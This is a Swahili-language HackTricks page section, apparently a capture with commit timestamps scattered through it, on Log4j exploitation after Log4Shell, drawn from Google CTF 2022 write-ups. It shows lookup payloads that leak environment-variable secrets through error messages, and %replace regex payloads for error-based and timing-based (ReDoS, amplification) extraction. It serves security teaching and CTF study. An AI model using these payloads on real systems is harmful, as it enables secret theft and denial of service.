2022-02-02 15:35:20 +00:00
* [**https://github.com/leonjza/log4jpwn**](https://github.com/leonjza/log4jpwn)
* [**https://github.com/christophetd/log4shell-vulnerable-app**](https://github.com/christophetd/log4shell-vulnerable-app)
2021-12-24 01:52:37 +00:00
## Post-Log4Shell Exploitation
2022-08-10 14:32:58 +00:00
Katika [**CTF writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) inafafanuliwa vizuri jinsi inavyoweza kuwa **inawezekana** **kudhulumu** baadhi ya vipengele vya **Log4J**.
2022-08-10 14:32:58 +00:00
[**ukurasa wa usalama**](https://logging.apache.org/log4j/2.x/security.html) wa Log4j una sentensi za kuvutia:
2022-08-10 14:32:58 +00:00
> Kuanzia toleo 2.16.0 (kwa Java 8), **kipengele cha kutafuta ujumbe kimeondolewa kabisa**. **Matafutizi katika usanidi bado yanafanya kazi**. Zaidi ya hayo, Log4j sasa inazima ufikiaji wa JNDI kwa default. Matafutizi ya JNDI katika usanidi sasa yanahitaji kuwezeshwa wazi.
2022-08-10 14:32:58 +00:00
> Kuanzia toleo 2.17.0, (na 2.12.3 na 2.3.1 kwa Java 7 na Java 6), **ni maandiko pekee ya kutafuta katika usanidi yanayopanuliwa kwa kurudi nyuma**; katika matumizi mengine yoyote, tu kutafuta kiwango cha juu ndiko kunatatuliwa, na matafutizi yoyote ya ndani hayatatuliwa.
2022-08-10 14:32:58 +00:00
Hii inamaanisha kwamba kwa default unaweza **kusahau kutumia yoyote `jndi` exploit**. Zaidi ya hayo, ili kufanya **matafutizi ya kurudi nyuma** unahitaji kuwa na hizo zimewekwa.
2022-08-10 14:32:58 +00:00
Kwa mfano, katika hiyo CTF hii ilipangwa katika faili log4j2.xml:
2022-08-10 14:32:58 +00:00
```xml
<Console name="Console" target="SYSTEM_ERR">
2024-02-11 02:13:58 +00:00
<PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
</PatternLayout>
2022-08-10 14:32:58 +00:00
</Console>
```
### Env Lookups
2022-08-10 14:32:58 +00:00
Katika [CTF hii](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/) mshambuliaji alidhibiti thamani ya `${sys:cmd}` na alihitaji kutoa bendera kutoka kwa mabadiliko ya mazingira.\
Kama inavyoonekana kwenye ukurasa huu katika [**payloads za awali**](jndi-java-naming-and-directory-interface-and-log4shell.md#verification) kuna njia tofauti za kufikia mabadiliko ya mazingira, kama vile: **`${env:FLAG}`**. Katika CTF hii hii haikuwa na manufaa lakini inaweza kuwa na manufaa katika hali nyingine za maisha halisi.
2022-08-10 14:32:58 +00:00
### Exfiltration in Exceptions
2022-08-10 14:32:58 +00:00
Katika CTF, **haukupata kufikia stderr** ya programu ya java inayotumia log4J, lakini **makosa ya Log4J yatumwa kwa stdout**, ambayo yalichapishwa katika programu ya python. Hii ilimaanisha kwamba kwa kuchochea kosa tunaweza kufikia maudhui. Kosa la kutoa bendera lilikuwa: **`${java:${env:FLAG}}`.** Hii inafanya kazi kwa sababu **`${java:CTF{blahblah}}`** haipo na kosa lenye thamani ya bendera litakuwa limeonyeshwa:
2022-08-10 14:32:58 +00:00
![](<../../.gitbook/assets/image (1023).png>)
2022-08-10 14:32:58 +00:00
### Conversion Patterns Exceptions
2022-08-10 14:32:58 +00:00
Ili tu kutaja, unaweza pia kuingiza [**patterns za mabadiliko**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) mpya na kuchochea makosa ambayo yataandikwa kwenye `stdout`. Kwa mfano:
2022-08-10 14:32:58 +00:00
![](<../../.gitbook/assets/image (683).png>)
2022-08-10 14:32:58 +00:00
Hii haikupatikana kuwa na manufaa kutoa tarehe ndani ya ujumbe wa kosa, kwa sababu utafutaji haukufanikiwa kabla ya pattern ya mabadiliko, lakini inaweza kuwa na manufaa kwa mambo mengine kama vile kugundua.
2022-08-10 14:32:58 +00:00
### Conversion Patterns Regexes
2022-08-10 14:32:58 +00:00
Hata hivyo, inawezekana kutumia **patterns za mabadiliko ambazo zinasaidia regexes** kutoa taarifa kutoka kwa utafutaji kwa kutumia regexes na kutumia **binary search** au tabia za **muda**.
2022-08-10 14:32:58 +00:00
* **Binary search kupitia ujumbe wa makosa**
2022-08-10 14:32:58 +00:00
Pattern ya mabadiliko **`%replace`** inaweza kutumika **kuchukua nafasi** **maudhui** kutoka kwa **nyuzi** hata kwa kutumia **regexes**. Inafanya kazi kama ifuatavyo: `replace{pattern}{regex}{substitution}`\
Kwa kutumia tabia hii unaweza kufanya kuchukua nafasi **kuchochea kosa ikiwa regex ilikubaliana** na chochote ndani ya nyuzi (na hakuna kosa ikiwa haikupatikana) kama ifuatavyo:
2022-08-10 14:32:58 +00:00
```bash
%replace{${env:FLAG}}{^CTF.*}{${error}}
# The string searched is the env FLAG, the regex searched is ^CTF.*
## and ONLY if it's found ${error} will be resolved with will trigger an exception
```
* **Wakati msingi**
2022-08-10 14:32:58 +00:00
Kama ilivyotajwa katika sehemu ya awali, **`%replace`** inasaidia **regexes**. Hivyo inawezekana kutumia payload kutoka kwenye [**ReDoS page**](../regular-expression-denial-of-service-redos.md) kusababisha **timeout** ikiwa bendera imepatikana.\
Kwa mfano, payload kama `%replace{${env:FLAG}}{^(?=CTF)((.`_`)`_`)*salt$}{asd}` itasababisha **timeout** katika CTF hiyo.
2022-08-10 14:32:58 +00:00
Katika [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/), badala ya kutumia shambulio la ReDoS ilitumia **shambulio la amplification** kusababisha tofauti ya muda katika majibu:
2022-08-10 14:46:00 +00:00
> ```
> /%replace{
> %replace{
> %replace{
> %replace{
> %replace{
> %replace{
> %replace{${ENV:FLAG}}{CTF\{" + flagGuess + ".*\}}{#############################}
> }{#}{######################################################}
> }{#}{######################################################}
> }{#}{######################################################}
> }{#}{######################################################}
> }{#}{######################################################}
> }{#}{######################################################}
> }{#}{######################################################}
> }{#}{######################################################}
2022-08-10 14:46:00 +00:00
> ```
>
> Ikiwa bendera inaanza na `flagGuess`, bendera nzima inabadilishwa na `#` 29 (nilitumia tabia hii kwa sababu huenda isiwe sehemu ya bendera). **Kila moja ya `#` 29 inayotokana kisha inabadilishwa na `#` 54**. Mchakato huu unarudiwa **mara 6**, na kusababisha jumla ya ` 29*54*54^6* =`` `` `**`96816014208`** **`#`-s!**
2022-08-10 14:46:00 +00:00
>
> Kubadilisha `#` nyingi kama hizo kutasababisha timeout ya sekunde 10 ya programu ya Flask, ambayo kwa upande wake itasababisha msimbo wa hali ya HTTP 500 kutumwa kwa mtumiaji. (Ikiwa bendera haianzi na `flagGuess`, tutapata msimbo wa hali usio 500)
2022-08-10 14:46:00 +00:00
## Marejeleo
2021-12-24 01:52:37 +00:00
* [https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/)
* [https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/](https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/)
* [https://www.youtube.com/watch?v=XG14EstTgQ4](https://www.youtube.com/watch?v=XG14EstTgQ4)
* [https://tryhackme.com/room/solar](https://tryhackme.com/room/solar)
2021-12-26 17:34:46 +00:00
* [https://www.youtube.com/watch?v=Y8a5nB-vy78](https://www.youtube.com/watch?v=Y8a5nB-vy78)
* [https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf)
2022-08-10 14:47:15 +00:00
* [https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/)
* [https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/)
2022-04-28 16:01:33 +00:00
**Kundi la Usalama wa Jaribio Ngumu**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
2024-02-03 14:45:32 +00:00
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}